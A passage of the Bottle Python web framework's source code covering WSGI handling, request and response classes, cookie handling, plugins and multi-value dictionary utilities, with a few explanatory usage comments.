return self._cast(out.body)
# File-like objects.
if hasattr(out, 'read'):
if 'wsgi.file_wrapper' in request.environ:
return request.environ['wsgi.file_wrapper'](out)
elif hasattr(out, 'close') or not hasattr(out, '__iter__'):
return WSGIFileWrapper(out)
# Handle Iterables. We peek into them to detect their inner type.
try:
iout = iter(out)
first = next(iout)
while not first:
first = next(iout)
except StopIteration:
return self._cast('')
except HTTPResponse:
first = _e()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except:
if not self.catchall: raise
first = HTTPError(500, 'Unhandled exception', _e(), format_exc())
# These are the inner types allowed in iterator or generator objects.
if isinstance(first, HTTPResponse):
return self._cast(first)
elif isinstance(first, bytes):
new_iter = itertools.chain([first], iout)
elif isinstance(first, unicode):
encoder = lambda x: x.encode(response.charset)
new_iter = imap(encoder, itertools.chain([first], iout))
else:
msg = 'Unsupported response type: %s' % type(first)
return self._cast(HTTPError(500, msg))
if hasattr(out, 'close'):
new_iter = _closeiter(new_iter, out.close)
return new_iter
def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """
try:
out = self._cast(self._handle(environ))
# rfc2616 section 4.3
if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close()
out = []
start_response(response._status_line, response.headerlist)
return out
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except:
if not self.catchall: raise
err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/'))
if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(_e())), html_escape(format_exc()))
environ['wsgi.errors'].write(err)
headers = [('Content-Type', 'text/html; charset=UTF-8')]
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
return [tob(err)]
def __call__(self, environ, start_response):
""" Each instance of :class:'Bottle' is a WSGI application. """
return self.wsgi(environ, start_response)
def __enter__(self):
""" Use this application as default for all module-level shortcuts. """
default_app.push(self)
return self
def __exit__(self, exc_type, exc_value, traceback):
default_app.pop()
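# Usage sketch (illustrative; relies on the module-level shortcuts defined
# further down in this file): using an application as a context manager makes
# it the default target for module-level decorators such as route().
#
#     app = Bottle()
#     with app:
#         @route('/ping')          # registered on `app`, not the global default app
#         def ping():
#             return 'pong'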
###############################################################################
# HTTP and WSGI Tools ##########################################################
###############################################################################
class BaseRequest(object):
""" A wrapper for WSGI environment dictionaries that adds a lot of
convenient access methods and properties. Most of them are read-only.
Adding new attributes to a request actually adds them to the environ
dictionary (as 'bottle.request.ext.<name>'). This is the recommended
way to store and access request-specific data.
"""
__slots__ = ('environ', )
#: Maximum size of memory buffer for :attr:`body` in bytes.
MEMFILE_MAX = 102400
def __init__(self, environ=None):
""" Wrap a WSGI environ dictionary. """
#: The wrapped WSGI environ dictionary. This is the only real attribute.
#: All other attributes actually are read-only properties.
self.environ = {} if environ is None else environ
self.environ['bottle.request'] = self
@DictProperty('environ', 'bottle.app', read_only=True)
def app(self):
""" Bottle application handling this request. """
raise RuntimeError('This request is not connected to an application.')
@DictProperty('environ', 'bottle.route', read_only=True)
def route(self):
""" The bottle :class:`Route` object that matches this request. """
raise RuntimeError('This request is not connected to a route.')
@DictProperty('environ', 'route.url_args', read_only=True)
def url_args(self):
""" The arguments extracted from the URL. """
raise RuntimeError('This request is not connected to a route.')
@property
def path(self):
""" The value of ``PATH_INFO`` with exactly one prefixed slash (to fix
broken clients and avoid the "empty path" edge case). """
return '/' + self.environ.get('PATH_INFO','').lstrip('/')
@property
def method(self):
""" The ``REQUEST_METHOD`` value as an uppercase string. """
return self.environ.get('REQUEST_METHOD', 'GET').upper()
@DictProperty('environ', 'bottle.request.headers', read_only=True)
def headers(self):
""" A :class:`WSGIHeaderDict` that provides case-insensitive access to
HTTP request headers. """
return WSGIHeaderDict(self.environ)
def get_header(self, name, default=None):
""" Return the value of a request header, or a given default value. """
return self.headers.get(name, default)
@DictProperty('environ', 'bottle.request.cookies', read_only=True)
def cookies(self):
""" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT
decoded. Use :meth:`get_cookie` if you expect signed cookies. """
cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values()
return FormsDict((c.key, c.value) for c in cookies)
def get_cookie(self, key, default=None, secret=None):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
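# Example sketch (added for illustration): reading a signed cookie. The secret
# must match the one passed to BaseResponse.set_cookie(); on a missing cookie
# or a bad signature the default is returned.
#
#     account = request.get_cookie('account', secret='my-secret-key')
#     if account is None:
#         pass  # not logged in (or a tampered cookie)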
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
""" The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
should not be confused with the "URL wildcards" provided by the
:class:`Router`. """
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
""" If the ``Content-Type`` header is ``application/json``, this
property holds the parsed content of the request body. Only requests
smaller than :attr:`MEMFILE_MAX` are processed to avoid memory
exhaustion. """
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype == 'application/json':
b = self._get_body_string()
if not b:
return None
return json_loads(b)
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
@staticmethod
def _iter_chunked(read, bufsize):
err = HTTPError(400, 'Error while parsing chunked transfer body.')
rn, sem, bs = tob('\r\n'), tob(';'), tob('')
while True:
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
body_iter = self._iter_chunked if self.chunked else self._iter_body
read_func = self.environ['wsgi.input'].read
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self):
""" read body until content-length or MEMFILE_MAX into a string. Raise
HTTPError(413) on requests that are to large. """
clen = self.content_length
if clen > self.MEMFILE_MAX:
raise HTTPError(413, 'Request too large')
if clen < 0: clen = self.MEMFILE_MAX + 1
data = self.body.read(clen)
if len(data) > self.MEMFILE_MAX: # Fail fast
raise HTTPError(413, 'Request too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
""" True if Chunked transfer encoding was. """
return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1'))
for key, value in pairs:
post[key] = value
return post
safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py31:
args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8',
newline='\n')
elif py3k:
args['encoding'] = 'utf8'
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394#msg207958
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
""" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. """
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
""" The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and trailing
slashes. """
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
""" Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
"""
script = self.environ.get('SCRIPT_NAME','/')
self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift)
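# Illustrative sketch of path_shift(): with SCRIPT_NAME='/' and PATH_INFO='/a/b/c',
#
#     request.path_shift(1)    # SCRIPT_NAME becomes '/a',  PATH_INFO becomes '/b/c'
#     request.path_shift(-1)   # shifts the segment back again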
@property
def content_length(self):
""" The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. """
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
""" The Content-Type header as a lowercase-string (default: empty). """
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
""" True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). """
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
""" Alias for :attr:`is_xhr`. "Ajax" is not the right term. """
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This only works
if all proxies support the ``X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
return route[0] if route else None
def copy(self):
""" Return a new :class:`Request` with a shallow :attr:`environ` copy. """
return Request(self.environ.copy())
def get(self, value, default=None): return self.environ.get(value, default)
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
def __setitem__(self, key, value):
""" Change an environ value and clear all caches that depend on it. """
if self.environ.get('bottle.request.readonly'):
raise KeyError('The environ dictionary is read-only.')
self.environ[key] = value
todelete = ()
if key == 'wsgi.input':
todelete = ('body', 'forms', 'files', 'params', 'post', 'json')
elif key == 'QUERY_STRING':
todelete = ('query', 'params')
elif key.startswith('HTTP_'):
todelete = ('headers', 'cookies')
for key in todelete:
self.environ.pop('bottle.request.'+key, None)
def __repr__(self):
return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)
def __getattr__(self, name):
""" Search in self.environ for additional user defined attributes. """
try:
var = self.environ['bottle.request.ext.%s'%name]
return var.__get__(self) if hasattr(var, '__get__') else var
except KeyError:
raise AttributeError('Attribute %r not defined.' % name)
def __setattr__(self, name, value):
if name == 'environ': return object.__setattr__(self, name, value)
self.environ['bottle.request.ext.%s'%name] = value
def _hkey(s):
return s.title().replace('_','-')
class HeaderProperty(object):
def __init__(self, name, reader=None, writer=str, default=''):
self.name, self.default = name, default
self.reader, self.writer = reader, writer
self.__doc__ = 'Current value of the %r header.' % name.title()
def __get__(self, obj, _):
if obj is None: return self
value = obj.headers.get(self.name, self.default)
return self.reader(value) if self.reader else value
def __set__(self, obj, value):
obj.headers[self.name] = self.writer(value)
def __delete__(self, obj):
del obj.headers[self.name]
class BaseResponse(object):
""" Storage class for a response body as well as headers and cookies.
This class does support dict-like case-insensitive item-access to
headers, but is NOT a dict. Most notably, iterating over a response
yields parts of the body and not the headers.
:param body: The response body as one of the supported types.
:param status: Either an HTTP status code (e.g. 200) or a status line
including the reason phrase (e.g. '200 OK').
:param headers: A dictionary or a list of name-value pairs.
Additional keyword arguments are added to the list of headers.
Underscores in the header name are replaced with dashes.
"""
default_status = 200
default_content_type = 'text/html; charset=UTF-8'
# Header blacklist for specific response codes
# (rfc2616 section 10.2.3 and 10.3.5)
bad_headers = {
204: set(('Content-Type',)),
304: set(('Allow', 'Content-Encoding', 'Content-Language',
'Content-Length', 'Content-Range', 'Content-Type',
'Content-Md5', 'Last-Modified'))}
def __init__(self, body='', status=None, headers=None, **more_headers):
self._cookies = None
self._headers = {}
self.body = body
self.status = status or self.default_status
if headers:
if isinstance(headers, dict):
headers = headers.items()
for name, value in headers:
self.add_header(name, value)
if more_headers:
for name, value in more_headers.items():
self.add_header(name, value)
def copy(self, cls=None):
""" Returns a copy of self. """
cls = cls or BaseResponse
assert issubclass(cls, BaseResponse)
copy = cls()
copy.status = self.status
copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())
if self._cookies:
copy._cookies = SimpleCookie()
copy._cookies.load(self._cookies.output())
return copy
def __iter__(self):
return iter(self.body)
def close(self):
if hasattr(self.body, 'close'):
self.body.close()
@property
def status_line(self):
""" The HTTP status line as a string (e.g. ``404 Not Found``)."""
return self._status_line
@property
def status_code(self):
""" The HTTP status code as an integer (e.g. 404)."""
return self._status_code
def _set_status(self, status):
if isinstance(status, int):
code, status = status, _HTTP_STATUS_LINES.get(status)
elif ' ' in status:
status = status.strip()
code = int(status.split()[0])
else:
raise ValueError('String status line without a reason phrase.')
if not 100 <= code <= 999: raise ValueError('Status code out of range.')
self._status_code = code
self._status_line = str(status or ('%d Unknown' % code))
def _get_status(self):
return self._status_line
status = property(_get_status, _set_status, None,
''' A writeable property to change the HTTP response status. It accepts
either a numeric code (100-999) or a string with a custom reason
phrase (e.g. "404 Brain not found"). Both :data:`status_line` and
:data:`status_code` are updated accordingly. The return value is
always a status string. ''')
del _get_status, _set_status
@property
def headers(self):
""" An instance of :class:`HeaderDict`, a case-insensitive dict-like
view on the response headers. """
hdict = HeaderDict()
hdict.dict = self._headers
return hdict
def __contains__(self, name): return _hkey(name) in self._headers
def __delitem__(self, name): del self._headers[_hkey(name)]
def __getitem__(self, name): return self._headers[_hkey(name)][-1]
def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)]
def get_header(self, name, default=None):
""" Return the value of a previously defined header. If there is no
header with that name, return a default value. """
return self._headers.get(_hkey(name), [default])[-1]
def set_header(self, name, value):
""" Create a new response header, replacing any previously defined
headers with the same name. """
self._headers[_hkey(name)] = [str(value)]
def add_header(self, name, value):
""" Add an additional response header, not removing duplicates. """
self._headers.setdefault(_hkey(name), []).append(str(value))
def iter_headers(self):
""" Yield (header, value) tuples, skipping headers that are not
allowed with the current response status code. """
return self.headerlist
@property
def headerlist(self):
""" WSGI conform list of (header, value) tuples. """
out = []
headers = list(self._headers.items())
if 'Content-Type' not in self._headers:
headers.append(('Content-Type', [self.default_content_type]))
if self._status_code in self.bad_headers:
bad_headers = self.bad_headers[self._status_code]
headers = [h for h in headers if h[0] not in bad_headers]
out += [(name, val) for name, vals in headers for val in vals]
if self._cookies:
for c in self._cookies.values():
out.append(('Set-Cookie', c.OutputString()))
return out
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int)
expires = HeaderProperty('Expires',
reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),
writer=lambda x: http_date(x))
@property
def charset(self, default='UTF-8'):
""" Return the charset specified in the content-type header (default: utf8). """
if 'charset=' in self.content_type:
return self.content_type.split('charset=')[-1].split(';')[0].strip()
return default
def set_cookie(self, name, value, secret=None, **options):
""" Create a new cookie or replace an old one. If the `secret` parameter is
set, create a `Signed Cookie` (described below).
:param name: the name of the cookie.
:param value: the value of the cookie.
:param secret: a signature key required for signed cookies.
Additionally, this method accepts all RFC 2109 attributes that are
supported by :class:`cookie.Morsel`, including:
:param max_age: maximum age in seconds. (default: None)
:param expires: a datetime object or UNIX timestamp. (default: None)
:param domain: the domain that is allowed to read the cookie.
(default: current domain)
:param path: limits the cookie to a given path (default: current path)
:param secure: limit the cookie to HTTPS connections (default: off).
:param httponly: prevents client-side JavaScript from reading this cookie
(default: off, requires Python 2.6 or newer).
If neither `expires` nor `max_age` is set (default), the cookie will
expire at the end of the browser session (as soon as the browser
window is closed).
Signed cookies may store any pickle-able object and are
cryptographically signed to prevent manipulation. Keep in mind that
cookies are limited to 4kb in most browsers.
Warning: Signed cookies are not encrypted (the client can still see
the content) and not copy-protected (the client can restore an old
cookie). The main intention is to make pickling and unpickling
safe, not to store secret information on the client side.
"""
if not self._cookies:
self._cookies = SimpleCookie()
if secret:
value = touni(cookie_encode((name, value), secret))
elif not isinstance(value, basestring):
raise TypeError('Secret key missing for non-string Cookie.')
if len(value) > 4096: raise ValueError('Cookie value too long.')
self._cookies[name] = value
for key, value in options.items():
if key == 'max_age':
if isinstance(value, timedelta):
value = value.seconds + value.days * 24 * 3600
if key == 'expires':
if isinstance(value, (datedate, datetime)):
value = value.timetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
self._cookies[name][key.replace('_', '-')] = value
def delete_cookie(self, key, **kwargs):
""" Delete a cookie. Be sure to use the same `domain` and `path`
settings as used to create the cookie. """
kwargs['max_age'] = -1
kwargs['expires'] = 0
self.set_cookie(key, '', **kwargs)
def __repr__(self):
out = ''
for name, value in self.headerlist:
out += '%s: %s\n' % (name.title(), value.strip())
return out
def _local_property():
ls = threading.local()
def fget(_):
try: return ls.var
except AttributeError:
raise RuntimeError("Request context not initialized.")
def fset(_, value): ls.var = value
def fdel(_): del ls.var
return property(fget, fset, fdel, 'Thread-local property')
class LocalRequest(BaseRequest):
""" A thread-local subclass of :class:`BaseRequest` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`request`). If accessed during a
request/response cycle, this instance always refers to the *current*
request (even on a multithreaded server). """
bind = BaseRequest.__init__
environ = _local_property()
class LocalResponse(BaseResponse):
""" A thread-local subclass of :class:`BaseResponse` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`response`). Its attributes are used
to build the HTTP response at the end of the request/response cycle.
"""
bind = BaseResponse.__init__
_status_line = _local_property()
_status_code = _local_property()
_cookies = _local_property()
_headers = _local_property()
body = _local_property()
Request = BaseRequest
Response = BaseResponse
class HTTPResponse(Response, BottleException):
def __init__(self, body='', status=None, headers=None, **more_headers):
super(HTTPResponse, self).__init__(body, status, headers, **more_headers)
def apply(self, other):
other._status_code = self._status_code
other._status_line = self._status_line
other._headers = self._headers
other._cookies = self._cookies
other.body = self.body
class HTTPError(HTTPResponse):
default_status = 500
def __init__(self, status=None, body=None, exception=None, traceback=None,
**options):
self.exception = exception
self.traceback = traceback
super(HTTPError, self).__init__(body, status, **options)
###############################################################################
# Plugins ######################################################################
###############################################################################
class PluginError(BottleException): pass
class JSONPlugin(object):
name = 'json'
api = 2
def __init__(self, json_dumps=json_dumps):
self.json_dumps = json_dumps
def apply(self, callback, _):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
class TemplatePlugin(object):
""" This plugin applies the :func:`view` decorator to all routes with a
`template` config parameter. If the parameter is a tuple, the second
element must be a dict with additional options (e.g. `template_engine`)
or default variables for the template. """
name = 'template'
api = 2
def apply(self, callback, route):
conf = route.config.get('template')
if isinstance(conf, (tuple, list)) and len(conf) == 2:
return view(conf[0], **conf[1])(callback)
elif isinstance(conf, str):
return view(conf)(callback)
else:
return callback
#: Not a plugin, but part of the plugin API. TODO: Find a better place.
class _ImportRedirect(object):
def __init__(self, name, impmask):
""" Create a virtual package that redirects imports (see PEP 302). """
self.name = name
self.impmask = impmask
self.module = sys.modules.setdefault(name, imp.new_module(name))
self.module.__dict__.update({'__file__': __file__, '__path__': [],
'__all__': [], '__loader__': self})
sys.meta_path.append(self)
def find_module(self, fullname, path=None):
if '.' not in fullname: return
packname = fullname.rsplit('.', 1)[0]
if packname != self.name: return
return self
def load_module(self, fullname):
if fullname in sys.modules: return sys.modules[fullname]
modname = fullname.rsplit('.', 1)[1]
realname = self.impmask % modname
__import__(realname)
module = sys.modules[fullname] = sys.modules[realname]
setattr(self.module, modname, module)
module.__loader__ = self
return module
###############################################################################
# Common Utilities #############################################################
###############################################################################
class MultiDict(DictMixin):
""" This dict stores multiple values per key, but behaves exactly like a
normal dict in that it returns only the newest value for any given key.
There are special methods available to access the full list of values.
"""
def __init__(self, *a, **k):
self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())
def __len__(self): return len(self.dict)
def __iter__(self): return iter(self.dict)
def __contains__(self, key): return key in self.dict
def __delitem__(self, key): del self.dict[key]
def __getitem__(self, key): return self.dict[key][-1]
def __setitem__(self, key, value): self.append(key, value)
def keys(self): return self.dict.keys()
if py3k:
def values(self): return (v[-1] for v in self.dict.values())
def items(self): return ((k, v[-1]) for k, v in self.dict.items())
def allitems(self):
return ((k, v) for k, vl in self.dict.items() for v in vl)
iterkeys = keys
itervalues = values
iteritems = items
iterallitems = allitems
else:
def values(self): return [v[-1] for v in self.dict.values()]
def items(self): return [(k, v[-1]) for k, v in self.dict.items()]
def iterkeys(self): return self.dict.iterkeys()
def itervalues(self): return (v[-1] for v in self.dict.itervalues())
def iteritems(self):
return ((k, v[-1]) for k, v in self.dict.iteritems())
def iterallitems(self):
return ((k, v) for k, vl in self.dict.iteritems() for v in vl)
def allitems(self):
return [(k, v) for k, vl in self.dict.iteritems() for v in vl]
def get(self, key, default=None, index=-1, type=None):
""" Return the most recent value for a key.
:param default: The default value to be returned if the key is not
present or the type conversion fails.
:param index: An index for the list of available values.
:param type: If defined, this callable is used to cast the value
into a specific type. Exceptions are suppressed and result in
the default value being returned.
"""
try:
val = self.dict[key][index]
return type(val) if type else val
except Exception:
pass
return default
def append(self, key, value):
""" Add a new value to the list of values for this key. """
self.dict.setdefault(key, []).append(value)
def replace(self, key, value):
""" Replace the list of values with a single value. """
self.dict[key] = [value]
def getall(self, key):
""" Return a (possibly empty) list of values for a key. """
return self.dict.get(key) or []
#: Aliases for WTForms to mimic other multi-dict APIs (Django)
getone = get
getlist = getall
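# Example sketch (not in the original source): MultiDict semantics.
#
#     md = MultiDict(a=1)
#     md['a'] = 2               # item assignment appends instead of replacing
#     md['a']                   # -> 2 (newest value)
#     md.getall('a')            # -> [1, 2]
#     md.get('a', type=str)     # -> '2' (cast via the `type` callable)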
class FormsDict(MultiDict):
""" This :class:`MultiDict` subclass is used to store request form data.
Additionally to the normal dict-like item access methods (which return
unmodified data as native strings), this container also supports
attribute-like access to its values. Attributes are automatically de-
or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing
attributes default to an empty string. """
#: Encoding used for attribute values.
input_encoding = 'utf8'
#: If true (default), unicode strings are first encoded with `latin1`
#: and then decoded to match :attr:`input_encoding`.
recode_unicode = True
def _fix(self, s, encoding=None):
if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI
return s.encode('latin1').decode(encoding or self.input_encoding)
elif isinstance(s, bytes): # Python 2 WSGI
return s.decode(encoding or self.input_encoding)
else:
return s
def decode(self, encoding=None):
""" Returns a copy with all keys and values de- or recoded to match
:attr:`input_encoding`. Some libraries (e.g. WTForms) want a
unicode dictionary. """
copy = FormsDict()
enc = copy.input_encoding = encoding or self.input_encoding
copy.recode_unicode = False
for key, value in self.allitems():
copy.append(self._fix(key, enc), self._fix(value, enc))
return copy
def getunicode(self, name, default=None, encoding=None):
""" Return the value as a unicode string, or the default. """
try:
return self._fix(self[name], encoding)
except (UnicodeError, KeyError):
return default
def __getattr__(self, name, default=unicode()):
# Without this guard, pickle generates a cryptic TypeError:
if name.startswith('__') and name.endswith('__'):
return super(FormsDict, self).__getattr__(name)
return self.getunicode(name, default=default)
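# Usage sketch (illustrative): the three access styles of FormsDict on a request.
#
#     name = request.forms.name           # attribute access: decoded, '' if missing
#     raw  = request.forms.get('name')    # dict access: unmodified native string
#     data = request.forms.decode()       # copy with all keys/values as unicode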
class HeaderDict(MultiDict):
""" A case-insensitive version of :class:`MultiDict` that defaults to
replace the old value instead of appending it. """
def __init__(self, *a, **ka):
self.dict = {}
if a or ka: self.update(*a, **ka)
def __contains__(self, key): return _hkey(key) in self.dict
def __delitem__(self, key): del self.dict[_hkey(key)]
def __getitem__(self, key): return self.dict[_hkey(key)][-1]
def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)]
def append(self, key, value):
self.dict.setdefault(_hkey(key), []).append(str(value))
def replace(self, key, value): self.dict[_hkey(key)] = [str(value)]
def getall(self, key): return self.dict.get(_hkey(key)) or []
def get(self, key, default=None, index=-1):
return MultiDict.get(self, _hkey(key), default, index)
def filter(self, names):
for name in [_hkey(n) for n in names]:
if name in self.dict:
del self.dict[name]
class WSGIHeaderDict(DictMixin):
""" This dict-like class wraps a WSGI environ dict and provides convenient
access to HTTP_* fields. Keys and values are native strings
(2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI
environment contains non-native string values, these are de- or encoded
using a lossless 'latin1' character set.
The API will remain stable even on changes to the relevant PEPs.
Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one
that uses non-native strings.)
"""
#: List of keys that do not have a ``HTTP_`` prefix.
cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')
def __init__(self, environ):
self.environ = environ
def _ekey(self, key):
""" Translate header field name to CGI/WSGI environ key. """
key = key.replace('-','_').upper()
if key in self.cgikeys:
return key
return 'HTTP_' + key
def raw(self, key, default=None):
""" Return the header value as is (may be bytes or unicode). """
return self.environ.get(self._ekey(key), default)
def __getitem__(self, key):
return tonat(self.environ[self._ekey(key)], 'latin1')
def __setitem__(self, key, value):
raise TypeError("%s is read-only." % self.__class__)
def __delitem__(self, key):
raise TypeError("%s is read-only." % self.__class__)
def __iter__(self):
for key in self.environ:
if key[:5] == 'HTTP_':
yield _hkey(key[5:])
elif key in self.cgikeys:
yield _hkey(key)
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._ekey(key) in self.environ
class ConfigDict(dict):
